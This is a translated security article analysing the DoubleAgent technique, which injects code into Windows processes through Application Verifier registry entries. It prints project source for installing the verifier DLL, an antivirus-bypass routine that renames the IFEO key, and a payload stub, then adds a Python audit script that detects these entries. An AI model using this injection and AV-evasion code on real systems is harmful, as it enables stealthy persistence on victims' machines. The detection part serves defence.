This article analyzes the code-injection and persistence attack technique of the DoubleAgent zero-day vulnerability. Its scope:
1. Every Windows version from XP to Windows 10 is affected.
2. Both the x86 and x64 Windows architectures are affected.
3. Both the Windows SYSTEM and Admin users are affected.
4. Windows machines running privileged OS and antivirus processes are affected.
Usage: DoubleAgent.exe install|uninstall|repair process_name
e.g. DoubleAgent.exe install cmd.exe
/*
 * Installs an application verifier for the process
 */
DOUBLEAGENT_STATUS VERIFIER_Install(IN PCWSTR pcwszProcessName, IN PCWSTR pcwszVrfDllName, IN PCWSTR pcwszVrfDllPathX86, IN PCWSTR pcwszVrfDllPathX64);

/*
 * In some cases (application crash, exception, etc.) the install/uninstall functions may accidentally leave the machine in an undefined state
 * Repairs the machine to its original state
 */
DOUBLEAGENT_STATUS VERIFIER_Repair(VOID);

/*
 * Uninstalls the application verifier from the process
 */
VOID VERIFIER_Uninstall(IN PCWSTR pcwszProcessName, IN PCWSTR pcwszVrfDllName);
/* Creates the VerifierDlls value and sets it to the verifier dll name */
bCreatedVerifierDlls = (ERROR_SUCCESS == RegSetKeyValueW(hIfeoKey, pcwszProcessName, VERIFIER_VERIFIERDLLS_VALUE_NAME, REG_SZ, pcwszVrfDllName, dwVrfDllNameLenInBytes));

/*
 * Creates the GlobalFlag value and sets it to FLG_APPLICATION_VERIFIER
 * Read more: https://msdn.microsoft.com/en-us/library/windows/hardware/ff542875(v=vs.85).aspx
 */
bCreatedGlobalFlag = (ERROR_SUCCESS == RegSetKeyValueW(hIfeoKey, pcwszProcessName, VERIFIER_GLOBALFLAG_VALUE_NAME, REG_DWORD, &dwGlobalFlag, sizeof(dwGlobalFlag)));

/*
 * The key creation might fail because some antiviruses protect the keys of their processes under the IFEO
 * One possible bypass is to rename the IFEO key name to a temporary name, create the keys, and restore the IFEO key name
 */
if ((FALSE == bCreatedVerifierDlls) || (FALSE == bCreatedGlobalFlag))
{
    /* Renames the IFEO key name to a temporary name */
    if (ERROR_SUCCESS != RegRenameKey(hIfeoKey, NULL, VERIFIER_IMAGE_FILE_EXECUTION_OPTIONS_NAME_TEMP))
    {
        DOUBLEAGENT_SET(eStatus, DOUBLEAGENT_STATUS_DOUBLEAGENT_VERIFIER_REGISTER_REGRENAMEKEY_FAILED);
        goto lbl_cleanup;
    }
    bKeyRenamed = TRUE;

    /*
     * Opens the temporary IFEO key
     * The key is reopened because some antiviruses continue monitoring and blocking the handle that opened the original IFEO
     */
    if (ERROR_SUCCESS != RegOpenKeyExW(HKEY_LOCAL_MACHINE, VERIFIER_IMAGE_FILE_EXECUTION_OPTIONS_SUB_KEY_TEMP, 0, KEY_SET_VALUE | KEY_WOW64_64KEY, &hIfeoKeyTemp))
    {
        DOUBLEAGENT_SET(eStatus, DOUBLEAGENT_STATUS_DOUBLEAGENT_VERIFIER_REGISTER_REGOPENKEYEXW_FAILED_TEMP_IFEO);
        goto lbl_cleanup;
    }

    if (FALSE == bCreatedVerifierDlls)
    {
        /* Tries again to create the VerifierDlls value */
        if (ERROR_SUCCESS != RegSetKeyValueW(hIfeoKeyTemp, pcwszProcessName, VERIFIER_VERIFIERDLLS_VALUE_NAME, REG_SZ, pcwszVrfDllName, dwVrfDllNameLenInBytes))
        {
            DOUBLEAGENT_SET(eStatus, DOUBLEAGENT_STATUS_DOUBLEAGENT_VERIFIER_REGISTER_REGSETKEYVALUEW_FAILED_VERIFIERDLLS);
            goto lbl_cleanup;
        }
        bCreatedVerifierDllsTemp = TRUE;
    }

    if (FALSE == bCreatedGlobalFlag)
    {
        /* Tries again to create the GlobalFlag value */
        if (ERROR_SUCCESS != RegSetKeyValueW(hIfeoKeyTemp, pcwszProcessName, VERIFIER_GLOBALFLAG_VALUE_NAME, REG_DWORD, &dwGlobalFlag, sizeof(dwGlobalFlag)))
        {
            DOUBLEAGENT_SET(eStatus, DOUBLEAGENT_STATUS_DOUBLEAGENT_VERIFIER_REGISTER_REGSETKEYVALUEW_FAILED_GLOBALFLAG);
            goto lbl_cleanup;
        }
        bCreatedGlobalFlagTemp = TRUE;
    }
}
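The registry writes above leave a durable, auditable artifact: a subkey under Image File Execution Options named after the target image, carrying a VerifierDlls string and a GlobalFlag DWORD with the FLG_APPLICATION_VERIFIER bit (0x100) set. The script below is an added defensive example, not code from the DoubleAgent project or from the original article. It parses the text of a `reg export` of the IFEO key and reports every image configured to load a verifier provider DLL. The IFEO path and the 0x100 flag value are standard Windows facts; the embedded export is a constructed sample, and its image and DLL names are made up.

```python
"""Audit an IFEO registry export for Application Verifier DLL persistence.

Added defensive example (not DoubleAgent project code). Feed it the file
written by `reg export` of the IFEO key, or run it without arguments to
audit the constructed sample below.
"""
import re
from typing import Dict, List, Optional, Union

# Well-known IFEO location and the Application Verifier GlobalFlag bit (0x100).
IFEO_PATH = r"HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options"
FLG_APPLICATION_VERIFIER = 0x100

RegValue = Union[str, int]

# Constructed sample export: one hijacked image (cmd.exe), one benign
# Debugger entry, and one unrelated GlobalFlag. Names and DLL are made up.
SAMPLE_REG_EXPORT = r"""Windows Registry Editor Version 5.00

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options]

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\cmd.exe]
"VerifierDlls"="injected.dll"
"GlobalFlag"=dword:00000100

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\notepad.exe]
"Debugger"="C:\\tools\\windbg.exe"

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\svchost.exe]
"GlobalFlag"=dword:00000002
"""

KEY_LINE = re.compile(r"^\[(.+)\]$")
VALUE_LINE = re.compile(r'^"([^"]+)"=(.*)$')


def decode_value(raw: str) -> RegValue:
    """Decode the two .reg encodings this audit needs: REG_SZ and REG_DWORD."""
    if raw.startswith('"') and raw.endswith('"'):
        # .reg doubles backslashes and escapes quotes inside REG_SZ values.
        return raw[1:-1].replace('\\\\', '\\').replace('\\"', '"')
    if raw.lower().startswith("dword:"):
        return int(raw[len("dword:"):], 16)
    return raw  # hex:/expand-string data is left undecoded; not needed here


def parse_reg_export(text: str) -> Dict[str, Dict[str, RegValue]]:
    """Map each key path in the export to its {value name: decoded value}."""
    keys: Dict[str, Dict[str, RegValue]] = {}
    current: Optional[str] = None
    for line in (ln.strip() for ln in text.splitlines()):
        if not line or line.startswith("Windows Registry Editor"):
            continue
        key = KEY_LINE.match(line)
        if key:
            current = key.group(1)
            keys.setdefault(current, {})
            continue
        value = VALUE_LINE.match(line)
        if value and current is not None:
            keys[current][value.group(1)] = decode_value(value.group(2))
    return keys


def find_verifier_hijacks(keys: Dict[str, Dict[str, RegValue]]) -> List[dict]:
    """Report IFEO images configured to load a verifier provider DLL."""
    prefix = IFEO_PATH.lower() + "\\"
    findings: List[dict] = []
    for path, values in keys.items():
        if not path.lower().startswith(prefix):
            continue
        image = path[len(prefix):]
        if "\\" in image:
            continue  # nested subkeys (e.g. PerfOptions) are not per-image entries
        dlls = values.get("VerifierDlls")
        flags = values.get("GlobalFlag", 0)
        flag_set = isinstance(flags, int) and bool(flags & FLG_APPLICATION_VERIFIER)
        if dlls or flag_set:
            findings.append({
                "image": image,
                "verifier_dlls": dlls,
                "verifier_flag_set": flag_set,
                # Both values together are exactly what the installer writes.
                "severity": "high" if (dlls and flag_set) else "medium",
            })
    return findings


def audit_text(text: str) -> List[dict]:
    return find_verifier_hijacks(parse_reg_export(text))


def audit_file(path: str) -> List[dict]:
    # `reg export` writes UTF-16 LE with a BOM; "utf-16" honours the BOM.
    with open(path, encoding="utf-16") as fh:
        return audit_text(fh.read())


if __name__ == "__main__":
    import sys
    results = audit_file(sys.argv[1]) if len(sys.argv) > 1 else audit_text(SAMPLE_REG_EXPORT)
    for f in results:
        print(f"[{f['severity']}] {f['image']}: VerifierDlls={f['verifier_dlls']!r} "
              f"FLG_APPLICATION_VERIFIER={'set' if f['verifier_flag_set'] else 'clear'}")
```

A VerifierDlls entry without the 0x100 flag is inert but still unexpected on a production host, so it is reported at medium severity; the flag set without VerifierDlls enables the default verifier providers and is reported the same way. Because the installer renames the IFEO key to a temporary name while it writes, a one-off export can miss an in-progress installation; pairing this audit with registry-write auditing on the IFEO key and its parent covers that window.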
static BOOL main_DllMainProcessAttach(VOID)
{
    DOUBLEAGENT_STATUS eStatus = DOUBLEAGENT_STATUS_INVALID_VALUE;

    /*
     **************************************************************************
     Enter Your Code Here
     **************************************************************************
     */

    /* Succeeded */
    DOUBLEAGENT_SET(eStatus, DOUBLEAGENT_STATUS_SUCCESS);

    /* Returns status */
    return FALSE != DOUBLEAGENT_SUCCESS(eStatus);
}
Originally published: 1 April 2017
Author: xiaohui
This article comes from 嘶吼, a partner of the Yunqi Community; see the 嘶吼 website for related information.